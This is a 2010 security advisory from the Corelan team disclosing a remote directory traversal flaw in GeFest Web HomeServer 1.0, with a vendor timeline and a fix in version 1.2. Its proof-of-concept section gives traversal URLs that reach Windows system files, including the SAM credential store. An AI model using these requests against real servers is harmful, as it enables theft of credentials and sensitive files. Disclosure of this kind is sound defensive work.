Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23196
HistoryFeb 09, 2010 - 12:00 a.m.

CORELAN-10-010 - GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability

2010-02-0900:00:00
vulners.com
25
JSON

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / / __ \/ / _ \/ / __ `/ __ \ / / _ \/ __ `/ __ ` \ |
| / // // / / / __/ / // / / / / / // __/ // / / / / / / |
| \/\// \//\,// // \/\/\__,// // // |
| |
| http://www.corelan.be:8800 |
| [email protected] |
| |
|-------------------------------------------------[ EIP Hunters ]–|
| |
| Vulnerability Disclosure Report |

Advisory : CORELAN-10-010
Disclosure date : February 8th, 2010

0x00 : Vulnerability information

[] Product : GeFest Web HomeServer
[] Version : 1.0
[] URL : http://clearweb.org.ua/
[] Platform : Windows
[] Type of vulnerability : Remote Directory Traversal
[] Risk rating : High (possible access to sensitive files)
[] Issue fixed in version : 1.2
[] Vulnerability discovered by : MarkoT
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,
sinn3r, Jacky 'Redsees' & jnz

0x01 : Vendor description of software

From the vendor website:

"""Gefest Web Home Server is a Simple Web Server with Graphical User interface.
Server allow watch video directly from another pc.
Server allow create software storage.
Server support password protection.
Server allow review all user activity (Server log and Activity log)
Share your folders in internet or local network.
Add / Remove folders with use simple interface."""

0x02 : Vulnerability details

By default, the utility runs as an application (and it's very likely that people will run this with administrator privileges)
The discovered vulnerability allows an attacker to access files outside of the web application root.

PoC :
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32
http://192.168.1.200:8080/\../\../\../boot.ini

0x03 : Vendor communication

[] February 4th, 2010 - Vendor contacted
[] February 5th, 2010 - Version 1.20 released
[*] February 8th, 2010 - Public disclosure

JSON